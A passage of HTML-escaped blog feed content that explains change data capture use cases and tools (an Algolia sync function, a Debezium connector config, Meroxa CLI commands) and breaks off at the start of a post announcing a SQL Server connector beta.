  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payload &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; body&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; before&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; op &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;req&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;method &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;POST&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;// if read, create, or update operation create o update index&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;r&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;c&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;u&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;op&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;objectID &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; index&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;saveObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;d&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: d, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; index&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;deleteObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; res&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;200&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; res&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;500&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
 
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;logStreamName
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every time this function is triggered, it will look at the data change (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;) and perform the equivalent action in Algolia. For example, if a delete operation occurs in the database, we can perform a&lt;code class=&quot;language-text&quot;&gt;[deleteObject](https://www.algolia.com/doc/api-reference/api-methods/delete-objects/)&lt;/code&gt;in Algolia.&lt;/p&gt;
&lt;p&gt;Functions that respond to CDC events can be small and simple. But, CDC — along with event-based architectures — can simplify otherwise very complex architectures as well.&lt;/p&gt;
&lt;p&gt;For example, implementing Webhooks as a feature within your application becomes a more straightforward problem with CDC. Webhooks allow users to trigger a&lt;code class=&quot;language-text&quot;&gt;POST&lt;/code&gt; request when certain events occur, typically data changes. For example, with&lt;a href=&quot;https://docs.github.com/en/developers/webhooks-and-events/webhooks/about-webhooks&quot;&gt;Github&lt;/a&gt;, you can trigger a cloud function when a pull request is merged. A merged pull request is an&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operation to a data store, which means a CDC system can capture this event. Generally, most webhook events can be translated to&lt;code class=&quot;language-text&quot;&gt;INSERT``UPDATE&lt;/code&gt; and&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations that a CDC system can capture.&lt;/p&gt;
&lt;h3&gt;History&lt;/h3&gt;
&lt;p&gt;You may not want to act on the CDC event but only store the raw changes in some cases. Using CDC, a data pipeline can store all change events to a cloud bucket for long-term processing and analysis. The best place to store the data for historical analysis is within a cloud bucket, referred to as a data lake.&lt;/p&gt;
&lt;p&gt;A data lake is a centralized store that allows you to store all your structured and unstructured data at any scale. Data lakes typically leverage cloud object bucket solutions like Amazon S3 or&lt;a href=&quot;https://try.digitalocean.com/cloud-storage&quot;&gt;Digital Ocean Spaces&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*aIQX7E2Zlt3A-0Qr6Pso9w.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;For example, once the data is in a data lake, SQL query engines like &lt;a href=&quot;https://aws.amazon.com/big-data/what-is-presto/&quot;&gt;Amazon Presto&lt;/a&gt; can run analytic queries against the change datasets.&lt;/p&gt;
&lt;p&gt;While storing the raw changes, you not only have the current state of the data, you have &lt;em&gt;all&lt;/em&gt; the previous states (historical). That’s why CDC adds a ton of value to historical analysis.&lt;/p&gt;
&lt;p&gt;Having historical data allows you to support disaster recovery efforts and also allows you to answer retroactive questions about your data. For example, let’s say your team redefined how Monthly Active Users (MAU) are calculated. With the complete history of a user data set, one could perform the new MAU calculations based on any date in the past and compare the results to the current state.&lt;/p&gt;
&lt;p&gt;This rich history also has user-facing value. Audit logs and activity logs are features that display data changes to users.&lt;/p&gt;
&lt;p&gt;Capturing and storing change events offers a better architecture when these features are implemented. Like in Webhooks, audit logs and activity logs are rooted in operations that a CDC system can capture.&lt;/p&gt;
&lt;h3&gt;Alerting&lt;/h3&gt;
&lt;p&gt;The job of any alerting system is to notify a stakeholder of an event. For example, when you receive a new email notification, you are notified of an&lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation to an email data store. Typically, most alerts are related to a change in a data store, which means that CDC is great for powering alerting systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*f0OCLLgyaU2yFJUUlaRfeA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;For example, let’s say you have an eCommerce store. After enabling CDC on a table of purchases, you could capture the change event and notify the team by performing a Slack alert when there are new purchases.&lt;/p&gt;
&lt;p&gt;Just like audit or activity logs, notifications powered by CDC can not only provide information about the event that occurred but also provide details of the change itself:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Tom has updated the title from &quot;Meeting Notes&quot; to &quot;My New Meeting.&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This alerting behavior also has internal value. From an infrastructure monitoring perspective, CDC events can provide insight into how users interact with your application and data. For example, you could see when and how users add, update, or delete information. This data can be sent to&lt;a href=&quot;https://prometheus.io/&quot;&gt;Prometheus UI&lt;/a&gt; to monitor and act on this information.&lt;/p&gt;
&lt;h3&gt;Getting Started with CDC&lt;/h3&gt;
&lt;p&gt;In&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;part one&lt;/a&gt;, we talked about the various ways CDC is commonly implemented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Polling&lt;/li&gt;
&lt;li&gt;Database Triggers&lt;/li&gt;
&lt;li&gt;Streaming Logs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These can all be used to build the use cases we’ve discussed in this article. Best of all, since CDC focuses on the data, the process is programming language agnostic and can be integrated into most architectures.&lt;/p&gt;
&lt;h3&gt;Polling and Triggers&lt;/h3&gt;
&lt;p&gt;When using polling or database triggers, there is no overhead and nothing to install. You can get started by building your queries to poll or by leveraging your databases’ triggers if they are supported.&lt;/p&gt;
&lt;h3&gt;Streaming Logs&lt;/h3&gt;
&lt;p&gt;Databases use streaming replication logs for backup and recovery, which means that most databases provide some CDC behavior out of the box. How easy it is to tap into these events depends on the data store itself. The best place to get started is by digging into your database’s replication features. Here are some replication log resources for some of the most popular databases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/docs/9.0/wal-intro.html&quot;&gt;PostgreSQL’s Write-Ahead Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.mongodb.com/manual/core/replica-set-oplog/&quot;&gt;MongoDB’s Oplog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cockroachlabs.com/docs/v20.1/change-data-capture.html&quot;&gt;CockroachDB&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get started with streaming logs, the answer is tightly coupled to the database in question. In future articles, I’ll explore what it looks like for each of these.&lt;/p&gt;
&lt;p&gt;Implementing any of these directly does take some time, planning, and effort. If you’re trying to get started with CDC, the lowest barrier to entry is adopting a CDC tool that knows how to communicate and capture changes from the data stores you use.&lt;/p&gt;
&lt;h3&gt;Change Data Capture Tools&lt;/h3&gt;
&lt;p&gt;Here are some great tools for you to evaluate:&lt;/p&gt;
&lt;h3&gt;Debezium&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt; is by far the most popular CDC tool. Its well-maintained, open-sourced and built on top of &lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Apache Kafka&lt;/a&gt;. It supports &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/mongodb.html&quot;&gt;MongoDB,&lt;/a&gt; &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/mysql.html&quot;&gt;MySQL&lt;/a&gt;, &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/postgresql.html&quot;&gt;PostgreSQL&lt;/a&gt;, and more databases out of the box.&lt;/p&gt;
&lt;p&gt;At a high level, Debezium hooks into the replication logs of the database and emits the change events into Kafka. You can even run &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/operations/debezium-server.html&quot;&gt;Debezium standalone&lt;/a&gt; without Kafka.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*0rFy1SLmnB2Qnb7N1dhDaA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;What’s really nice is that Debezium is all configuration-based. After installing and configuring Debezium, you can configure connections to your datastore using a JSON-based configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fulfillment-connector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;config&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector.class&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;io.debezium.connector.postgresql.PostgresConnector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.hostname&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;192.168.99.100&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.port&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5432&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.user&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.password&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.dbname&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.server.name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fulfillment&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;table.include.list&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public.inventory&quot;&lt;/span&gt; 
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once connected, Debezium will perform an initial snapshot of your data and emit change events to a Kafka Topic. Then, services can&lt;a href=&quot;https://kafka.apache.org/documentation/#gettingStarted&quot;&gt;consume the topics&lt;/a&gt; and act on them.&lt;/p&gt;
&lt;p&gt;Here are some great places to get started with Debeizium:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://debezium.io/documentation/online-resources/&quot;&gt;Debezium resources on the web&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://debezium.io/documentation/reference/1.6/tutorial.html&quot;&gt;Debezium Tutorial&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Meroxa&lt;/h3&gt;
&lt;p&gt;Meroxa is a real-time data orchestration platform that gives you real-time infrastructure. Meroxa removes the time and overhead associated with configuring and managing brokers, connectors, transforms, functions, and streaming infrastructure. All you have to do is add your resources and construct your pipelines. Meroxa supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mongodb&quot;&gt;MongoDB&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Microsoft SQL Server&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;more&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;CDC pipelines can be built in a visual dashboard or using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;#&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;Add Resource&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; my-postgres &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# Add Webhook&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; my-url &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; url &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$CUSTOM_HTTP_URL&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# Create CDC Pipeline$ meroxa connect --from my-postgres --input $TABLE_NAME --to my-url&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I can’t wait to see what you build. 🚀&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback, I’d love to hear them. You can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discuss with me our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;&lt;strong&gt;Discord&lt;/strong&gt;&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Reach out to me on &lt;a href=&quot;https://www.notion.so/Stream-Your-Database-Changes-with-Change-Data-Capture-Part-Two-c5e1f0d9b19d4f5597fcefcb67c74fb1&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing Microsoft SQL Server Connector Beta]]></title><description><![CDATA[Microsoft SQL Server is a powerful, widely used relational database management system. Today, we’re releasing a beta version of our Microsoft SQL Server connector.]]></description><link>https://meroxa.com/blog/introducing-microsoft-sql-server-connector-beta</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-microsoft-sql-server-connector-beta</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 19 Aug 2021 15:33:00 GMT</pubDate><content:encoded>&lt;h3&gt;Real-time SQL Server Change Data Capture (CDC)&lt;/h3&gt;
&lt;p&gt;Microsoft SQL Server is a powerful, widely used relational database management system. Today, we’re releasing a public beta version of our Microsoft SQL Server as a source for real-time data streams.&lt;/p&gt;
&lt;p&gt;As a source, you can build pipelines that act on changes from SQL Server. For example, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract Transform Load (ETL) into a Data Warehouse.&lt;/li&gt;
&lt;li&gt;Real-time replication and sync to other data stores.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With Meroxa, it’s all streaming, real-time, and your pipelines will be up and running in minutes not months.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;To begin sending data to SQL Server, perform the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;Create an Account&lt;/a&gt; — By using the&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;dashboard&lt;/a&gt;, or the CLI.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Setup&lt;/a&gt; —Configure your Microsoft SQL Server instance and acquire the credentials needed to talk to Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource&quot;&gt;Add Resource&lt;/a&gt; — Use the&lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or&lt;code class=&quot;language-text&quot;&gt;[meroxa resource create](https://docs.meroxa.com/cli/cmd/meroxa-resources-create)&lt;/code&gt; command to add to your Meroxa Resource Catalog.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;SQL Server Source Connector&lt;/h3&gt;
&lt;p&gt;As a source, you can capture changes from SQL Server and send to&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-redshift&quot;&gt;Amazon Redshift&lt;/a&gt;, Webhooks, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3&lt;/a&gt; or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The SQL Server source is a CDC connector that leverages&lt;a href=&quot;https://docs.microsoft.com/en-us/sql/relational-databases/track-changes/about-change-data-capture-sql-server?view=sql-server-ver15&quot;&gt;SQL Server transaction log&lt;/a&gt;, which contains a list of every change events. This connector will perform an initial snapshot of the data. Then, it will stream every&lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt;,&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;,&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation and push the events into a Meroxa stream.&lt;/p&gt;
&lt;p&gt;This connector will emit data records in the following format:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*3UPlW3iDFuihoKqr2p6nOw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To create a source, you can use the&lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or&lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; command to create a new connector:&lt;/p&gt;
